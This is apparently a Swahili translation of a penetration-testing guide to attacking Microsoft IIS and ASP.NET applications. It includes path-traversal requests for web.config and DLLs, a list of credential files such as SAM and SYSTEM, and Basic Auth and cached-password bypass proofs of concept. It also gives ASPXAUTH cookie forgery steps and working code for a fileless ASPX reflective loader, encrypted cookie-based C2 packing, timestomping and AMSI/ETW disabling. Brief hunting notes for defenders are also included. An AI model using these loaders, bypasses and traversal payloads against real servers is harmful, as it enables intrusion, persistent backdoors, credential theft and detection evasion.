IIS - Internet Information Services

Reading time: 16 minutes

Aina za extensions za faili zinazotekelezwa za kujaribu:

• asp
• aspx
• config
• php

Ufunuo wa Anwani ya IP ya Ndani

Kwenye server yoyote ya IIS ambapo unapata 302 unaweza kujaribu kuondoa Host header na kutumia HTTP/1.0; ndani ya response, Location header inaweza kukuelekeza kwa anwani ya IP ya ndani:

nc -v domain.com 80
openssl s_client -connect domain.com:443

Majibu yanayofichua IP ya ndani:

GET / HTTP/1.0

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Pragma: no-cache
Location: https://192.168.5.237/owa/
Server: Microsoft-IIS/10.0
X-FEServer: NHEXCHANGE2016

Endesha faili za .config

Unaweza kupakia .config files na kuzitumia kutekeleza code. Njia moja ya kufanya hivyo ni kuongeza code mwishoni mwa faili ndani ya HTML comment: Download example here

More information and techniques to exploit this vulnerability here

Ugundaji wa IIS Bruteforce

Pakua orodha niliyotengeneza:

Iliundwa kwa kuunganisha yaliyomo kutoka kwenye orodha zifuatazo:

https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/IIS.fuzz.txt
http://itdrafts.blogspot.com/2013/02/aspnetclient-folder-enumeration-and.html
https://github.com/digination/dirbuster-ng/blob/master/wordlists/vulns/iis.txt
https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/aspx.txt
https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt
https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt

Tumia bila kuongeza kiendelezi chochote; faili zinazohitaji tayari zina kiendelezi hicho.

Path Traversal

Leaking source code

Angalia maelezo kamili katika: https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html

Katika .Net MVC applications, faili ya web.config ina jukumu muhimu kwa kubainisha kila binary file application inategemea kupitia XML tags za "assemblyIdentity".

Kuchunguza Binary Files

Mfano wa kufikia faili ya web.config unaonyeshwa hapa chini:

GET /download_page?id=..%2f..%2fweb.config HTTP/1.1
Host: example-mvc-application.minded

Ombi hili linafunua mipangilio na utegemezi mbalimbali, kama vile:

• EntityFramework toleo
• AppSettings kwa kurasa za wavuti, uthibitishaji wa mteja, na JavaScript
• System.web usanidi kwa ajili ya uthibitishaji na runtime
• System.webServer mipangilio ya moduli
• Runtime binding za assembly kwa maktaba nyingi kama Microsoft.Owin, Newtonsoft.Json, na System.Web.Mvc

Mipangilio hii inaonyesha kuwa baadhi ya faili, kama /bin/WebGrease.dll, ziko ndani ya folda ya /bin ya programu.

Mafaili ya Katalogi ya Mzizi

Mafaili yanayopatikana kwenye katalogi ya mzizi, kama /global.asax na /connectionstrings.config (ambayo ina nywila nyeti), ni muhimu kwa usanidi na uendeshaji wa programu.

Namespaces na Web.Config

Programu za MVC pia zinaelezea mafaili ya ziada ya web.config kwa namespaces maalum ili kuepuka matangazo ya kurudia kwa kila faili, kama inavyoonyeshwa na ombi la kupakua web.config nyingine:

GET /download_page?id=..%2f..%2fViews/web.config HTTP/1.1
Host: example-mvc-application.minded

Kupakua DLLs

Kutajwa kwa namespace maalum kunaashiria DLL iitwayo WebApplication1 iliyopo katika saraka /bin. Kufuatia hayo, ombi la kupakua WebApplication1.dll linaonyeshwa:

GET /download_page?id=..%2f..%2fbin/WebApplication1.dll HTTP/1.1
Host: example-mvc-application.minded

Hii inaashiria uwepo wa DLL nyingine muhimu, kama System.Web.Mvc.dll na System.Web.Optimization.dll, katika saraka /bin.

Katika tukio ambapo DLL inaimport namespace iitwayo WebApplication1.Areas.Minded, mshambuliaji anaweza kubahatisha kuwepo kwa faili nyingine za web.config katika njia zinazotabirika, kama /area-name/Views/, zikiwa na mipangilio maalum na marejeleo kwa DLL nyingine katika saraka /bin. Kwa mfano, ombi la /Minded/Views/web.config linaweza kufichua mipangilio na namespaces zinazobainisha uwepo wa DLL nyingine, WebApplication1.AdditionalFeatures.dll.

Common files

From here

C:\Apache\conf\httpd.conf
C:\Apache\logs\access.log
C:\Apache\logs\error.log
C:\Apache2\conf\httpd.conf
C:\Apache2\logs\access.log
C:\Apache2\logs\error.log
C:\Apache22\conf\httpd.conf
C:\Apache22\logs\access.log
C:\Apache22\logs\error.log
C:\Apache24\conf\httpd.conf
C:\Apache24\logs\access.log
C:\Apache24\logs\error.log
C:\Documents and Settings\Administrator\NTUser.dat
C:\php\php.ini
C:\php4\php.ini
C:\php5\php.ini
C:\php7\php.ini
C:\Program Files (x86)\Apache Group\Apache\conf\httpd.conf
C:\Program Files (x86)\Apache Group\Apache\logs\access.log
C:\Program Files (x86)\Apache Group\Apache\logs\error.log
C:\Program Files (x86)\Apache Group\Apache2\conf\httpd.conf
C:\Program Files (x86)\Apache Group\Apache2\logs\access.log
C:\Program Files (x86)\Apache Group\Apache2\logs\error.log
c:\Program Files (x86)\php\php.ini"
C:\Program Files\Apache Group\Apache\conf\httpd.conf
C:\Program Files\Apache Group\Apache\conf\logs\access.log
C:\Program Files\Apache Group\Apache\conf\logs\error.log
C:\Program Files\Apache Group\Apache2\conf\httpd.conf
C:\Program Files\Apache Group\Apache2\conf\logs\access.log
C:\Program Files\Apache Group\Apache2\conf\logs\error.log
C:\Program Files\FileZilla Server\FileZilla Server.xml
C:\Program Files\MySQL\my.cnf
C:\Program Files\MySQL\my.ini
C:\Program Files\MySQL\MySQL Server 5.0\my.cnf
C:\Program Files\MySQL\MySQL Server 5.0\my.ini
C:\Program Files\MySQL\MySQL Server 5.1\my.cnf
C:\Program Files\MySQL\MySQL Server 5.1\my.ini
C:\Program Files\MySQL\MySQL Server 5.5\my.cnf
C:\Program Files\MySQL\MySQL Server 5.5\my.ini
C:\Program Files\MySQL\MySQL Server 5.6\my.cnf
C:\Program Files\MySQL\MySQL Server 5.6\my.ini
C:\Program Files\MySQL\MySQL Server 5.7\my.cnf
C:\Program Files\MySQL\MySQL Server 5.7\my.ini
C:\Program Files\php\php.ini
C:\Users\Administrator\NTUser.dat
C:\Windows\debug\NetSetup.LOG
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\Panther\Unattended.xml
C:\Windows\php.ini
C:\Windows\repair\SAM
C:\Windows\repair\system
C:\Windows\System32\config\AppEvent.evt
C:\Windows\System32\config\RegBack\SAM
C:\Windows\System32\config\RegBack\system
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SecEvent.evt
C:\Windows\System32\config\SysEvent.evt
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\winevt\Logs\Application.evtx
C:\Windows\System32\winevt\Logs\Security.evtx
C:\Windows\System32\winevt\Logs\System.evtx
C:\Windows\win.ini
C:\xampp\apache\conf\extra\httpd-xampp.conf
C:\xampp\apache\conf\httpd.conf
C:\xampp\apache\logs\access.log
C:\xampp\apache\logs\error.log
C:\xampp\FileZillaFTP\FileZilla Server.xml
C:\xampp\MercuryMail\MERCURY.INI
C:\xampp\mysql\bin\my.ini
C:\xampp\php\php.ini
C:\xampp\security\webdav.htpasswd
C:\xampp\sendmail\sendmail.ini
C:\xampp\tomcat\conf\server.xml

HTTPAPI 2.0 404 Hitilafu

Ikiwa unaona hitilafu kama ifuatayo:

Inamaanisha kwamba server hakupokea jina sahihi la domain ndani ya Host header.
Ili kufikia ukurasa wa wavuti unaweza kuangalia SSL Certificate iliyotumwa na labda utapata jina la domain/subdomain huko. Ikiwa haisipatikani huko unaweza kuhitaji brute force VHosts hadi upate moja sahihi.

Dekripta mipangilio iliyofichwa na ASP.NET Core Data Protection key rings

Mifano miwili ya kawaida ya kulinda siri kwenye apps za .NET zilizo hostwa kwenye IIS ni:

• ASP.NET Protected Configuration (RsaProtectedConfigurationProvider) kwa sections za web.config kama .
• ASP.NET Core Data Protection key ring (persisted locally) inayotumika kulinda application secrets na cookies.

Ikiwa una ufikiaji wa filesystem au ufikiaji wa interactive kwenye web server, funguo zilizo co-located mara nyingi zinawezesha kufungua yaliyofichwa.

• ASP.NET (Full Framework) – dekripti sehemu za config zilizolindwa kwa aspnet_regiis:

# Decrypt a section by app path (site configured in IIS)
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe -pd "connectionStrings" -app "/MyApplication"

# Or specify the physical path (-pef/-pdf write/read to a config file under a dir)
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe -pdf "connectionStrings" "C:\inetpub\wwwroot\MyApplication"

• ASP.NET Core – angalia Data Protection key rings zilizohifadhiwa lokal (XML/JSON files) katika maeneo kama:
• %PROGRAMDATA%\Microsoft\ASP.NET\DataProtection-Keys
• HKLM\SOFTWARE\Microsoft\ASP.NET\Core\DataProtection-Keys (registry)
• App-managed folder (e.g., App_Data\keys or a Keys directory next to the app)

Ikiwa key ring inapatikana, operator anayekimbia kwa kitambulisho cha app anaweza kuanzisha IDataProtector na purposes sawa na kutumia Unprotect kwa secrets zilizohifadhiwa. Misconfigurations zinazohifadhi key ring pamoja na mafaili ya app zinafanya offline decryption iwe rahisi mara mwenyeji atakapoharibiwa.

IIS fileless backdoors and in-memory .NET loaders (NET-STAR style)

The Phantom Taurus/NET-STAR toolkit inaonyesha mtindo uliokomaa kwa fileless IIS persistence na post‑exploitation kabisa ndani ya w3wp.exe. Mawazo ya msingi yanatumika kwa upana kwa custom tradecraft na kwa detection/hunting.

Misingi muhimu

• ASPX bootstrapper hosting an embedded payload: ukurasa mmoja .aspx (e.g., OutlookEN.aspx) umebeba Base64‑encoded, optionally Gzip‑compressed .NET DLL. Baada ya trigger request inafanya decode, decompress na reflectively load ndani ya current AppDomain na kuiita main entry point (e.g., ServerRun.Run()).
• Cookie‑scoped, encrypted C2 with multi‑stage packing: tasks/results zimefungwa kwa Gzip → AES‑ECB/PKCS7 → Base64 na kusogezwa kupitia requests zinazoonekana halali zenye cookie nyingi; operators walitumia delimiters stable (e.g., "STAR") kwa chunking.
• Reflective .NET execution: inakubali arbitrary managed assemblies kama Base64, inazileta kupitia Assembly.Load(byte[]) na kupitisha operator args kwa module swaps ya haraka bila kugusa disk.
• Operating in precompiled ASP.NET sites: kuongeza/kusimamia auxiliary shells/backdoors hata wakati site imeprecompiled (e.g., dropper inaongeza dynamic pages/handlers au inatumia config handlers) – inafunguliwa kwa amri kama bypassPrecompiledApp, addshell, listshell, removeshell.
• Timestomping/metadata forgery: inaonyesha action ya changeLastModified na timestomp wakati wa deployment (ikiwa ni pamoja na future compilation timestamps) ili kuzuia DFIR.
• Optional AMSI/ETW pre‑disable for loaders: second‑stage loader inaweza kuzima AMSI na ETW kabla ya kuita Assembly.Load ili kupunguza uchunguzi wa in‑memory payloads.

Mfano mdogo wa ASPX loader pattern

<%@ Page Language="C#" %>
<%@ Import Namespace="System" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.IO.Compression" %>
<%@ Import Namespace="System.Reflection" %>
<script runat="server">
protected void Page_Load(object sender, EventArgs e){
// 1) Obtain payload bytes (hard‑coded blob or from request)
string b64 = /* hardcoded or Request["d"] */;
byte[] blob = Convert.FromBase64String(b64);
// optional: decrypt here if AES is used
using(var gz = new GZipStream(new MemoryStream(blob), CompressionMode.Decompress)){
using(var ms = new MemoryStream()){
gz.CopyTo(ms);
var asm = Assembly.Load(ms.ToArray());
// 2) Invoke the managed entry point (e.g., ServerRun.Run)
var t = asm.GetType("ServerRun");
var m = t.GetMethod("Run", BindingFlags.Public|BindingFlags.NonPublic|BindingFlags.Static|BindingFlags.Instance);
object inst = m.IsStatic ? null : Activator.CreateInstance(t);
m.Invoke(inst, new object[]{ HttpContext.Current });
}
}
}
</script>

Msaidizi wa Packing/crypto (Gzip + AES‑ECB + Base64)

using System.Security.Cryptography;

static byte[] AesEcb(byte[] data, byte[] key, bool encrypt){
using(var aes = Aes.Create()){
aes.Mode = CipherMode.ECB; aes.Padding = PaddingMode.PKCS7; aes.Key = key;
ICryptoTransform t = encrypt ? aes.CreateEncryptor() : aes.CreateDecryptor();
return t.TransformFinalBlock(data, 0, data.Length);
}
}

static string Pack(object obj, byte[] key){
// serialize → gzip → AES‑ECB → Base64
byte[] raw = Serialize(obj);                    // your TLV/JSON/msgpack
using var ms = new MemoryStream();
using(var gz = new GZipStream(ms, CompressionLevel.Optimal, true)) gz.Write(raw, 0, raw.Length);
byte[] enc = AesEcb(ms.ToArray(), key, true);
return Convert.ToBase64String(enc);
}

static T Unpack<T>(string b64, byte[] key){
byte[] enc = Convert.FromBase64String(b64);
byte[] cmp = AesEcb(enc, key, false);
using var gz = new GZipStream(new MemoryStream(cmp), CompressionMode.Decompress);
using var outMs = new MemoryStream(); gz.CopyTo(outMs);
return Deserialize<T>(outMs.ToArray());
}

Cookie/session mtiririko na command surface

• Session bootstrap and tasking hutumwa kupitia cookies ili kujumuika na shughuli za kawaida za web.
• Amri zilizobainika katika mazingira halisi zilijumuisha: fileExist, listDir, createDir, renameDir, fileRead, deleteFile, createFile, changeLastModified; addshell, bypassPrecompiledApp, listShell, removeShell; executeSQLQuery, ExecuteNonQuery; and dynamic execution primitives code_self, code_pid, run_code for in‑memory .NET execution.

Zana ya Timestomping

File.SetCreationTime(path, ts);
File.SetLastWriteTime(path, ts);
File.SetLastAccessTime(path, ts);

Zima AMSI/ETW inline kabla ya Assembly.Load (loader variant)

// Patch amsi!AmsiScanBuffer to return E_INVALIDARG
// and ntdll!EtwEventWrite to a stub; then load operator assembly
DisableAmsi();
DisableEtw();
Assembly.Load(payloadBytes).EntryPoint.Invoke(null, new object[]{ new string[]{ /* args */ } });

Angalia mbinu za kuvuka AMSI/ETW katika: windows-hardening/av-bypass.md

Hunting notes (defenders)

• Ukurasa mmoja wa ASPX usio wa kawaida wenye blobs ndefu sana za Base64/Gzip; maombi ya POST yenye cookie nyingi.
• Managed modules zisizo na backing ndani ya w3wp.exe; strings kama Encrypt/Decrypt (ECB), Compress/Decompress, GetContext, Run.
• Viganusho vinavyorudiwa kama "STAR" katika trafiki; timestamps zisizolingana au hata za siku za baadaye kwenye ASPX/assemblies.

Telerik UI WebResource.axd unsafe reflection (CVE-2025-3600)

Many ASP.NET apps embed Telerik UI for ASP.NET AJAX and expose the unauthenticated handler Telerik.Web.UI.WebResource.axd. When the Image Editor cache endpoint is reachable (type=iec), the parameters dkey=1 and prtype enable unsafe reflection that executes any public parameterless constructor pre‑auth. This yields a universal DoS primitive and can escalate to pre‑auth RCE on apps with insecure AppDomain.AssemblyResolve handlers.

See detailed techniques and PoCs here:

Telerik Ui Aspnet Ajax Unsafe Reflection Webresource Axd

Udhaifu wa zamani za IIS zinazostahili kutafutwa

Microsoft IIS tilde character “~” Vulnerability/Feature – Short File/Folder Name Disclosure

Unaweza kujaribu kuorodhesha folders na files ndani ya kila folda iliyogundulika (hata ikiwa inahitaji Basic Authentication) kwa kutumia mbinu hii.
Kikomo kikuu cha mbinu hii ikiwa server ni dhaifu ni kwamba inaweza kupata hadi herufi 6 za kwanza za jina la kila file/folder na herufi 3 za kwanza za extension ya files.

Unaweza kutumia https://github.com/irsdl/IIS-ShortName-Scanner kujaribu udhaifu huu:java -jar iis_shortname_scanner.jar 2 20 http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/

Utafiti wa awali: https://soroush.secproject.com/downloadable/microsoft_iis_tilde_character_vulnerability_feature.pdf

Unaweza pia kutumia metasploit: use scanner/http/iis_shortname_scanner

Wazo zuri la kupata jina la mwisho la files zilizogunduliwa ni kuwauliza LLMs kwa chaguzi kama ilivyofanywa kwenye script https://github.com/Invicti-Security/brainstorm/blob/main/fuzzer_shortname.py

Basic Authentication bypass

Bypass Basic Authentication (IIS 7.5) kwa kujaribu kufikia: /admin:$i30:$INDEX_ALLOCATION/admin.php au /admin::$INDEX_ALLOCATION/admin.php

Unaweza kujaribu kuunganisha udhaifu huu na ule uliopita ili kupata folders mpya na bypass authentication.

ASP.NET Trace.AXD enabled debugging

ASP.NET ina mode ya debugging na faili yake inaitwa trace.axd.

Inahifadhi log yenye maelezo mengi ya maombi yote yaliyofanywa kwa application katika kipindi cha muda.

Taarifa hizi zinajumuisha remote client IP's, session IDs, cookies zote za request na response, physical paths, taarifa za source code, na pengine hata usernames na passwords.

https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/

ASPXAUTH Cookie

ASPXAUTH inatumia taarifa zifuatazo:

• validationKey (string): hex-encoded key to use for signature validation.
• decryptionMethod (string): (default “AES”).
• decryptionIV (string): hex-encoded initialization vector (defaults to a vector of zeros).
• decryptionKey (string): hex-encoded key to use for decryption.

Hata hivyo, baadhi ya watu watatumia default values za vigezo hivi na watatumia kama cookie barua pepe ya mtumiaji. Kwa hivyo, ikiwa unaweza kupata wavuti inayotumia same platform ambayo inatumia ASPXAUTH cookie na wewe unda mtumiaji mwenye barua pepe ya mtumiaji unayetamani kumdai kwenye server inayoshambuliwa, unaweza kuwa na uwezo wa kutumia cookie kutoka server ya pili kwenye server ya kwanza na kumdai mtumiaji.
Shambulio hili lilifanya kazi katika writeup.

IIS Authentication Bypass with cached passwords (CVE-2022-30209)

Full report here: Hitilafu kwenye code haikuangalia vizuri password iliyotolewa na mtumiaji, hivyo mshambuliaji ambaye password hash yake inafikia key ambayo tayari ipo kwenye cache ataweza kuingia kama mtumiaji huyo.

# script for sanity check
> type test.py
def HashString(password):
j = 0
for c in map(ord, password):
j = c + (101*j)&0xffffffff
return j

assert HashString('test-for-CVE-2022-30209-auth-bypass') == HashString('ZeeiJT')

# before the successful login
> curl -I -su 'orange:ZeeiJT' 'http://<iis>/protected/' | findstr HTTP
HTTP/1.1 401 Unauthorized

# after the successful login
> curl -I -su 'orange:ZeeiJT' 'http://<iis>/protected/' | findstr HTTP
HTTP/1.1 200 OK

Marejeo

• Unit 42 – Phantom Taurus: A New Chinese Nexus APT and the Discovery of the NET-STAR Malware Suite
• AMSI/ETW bypass background (HackTricks)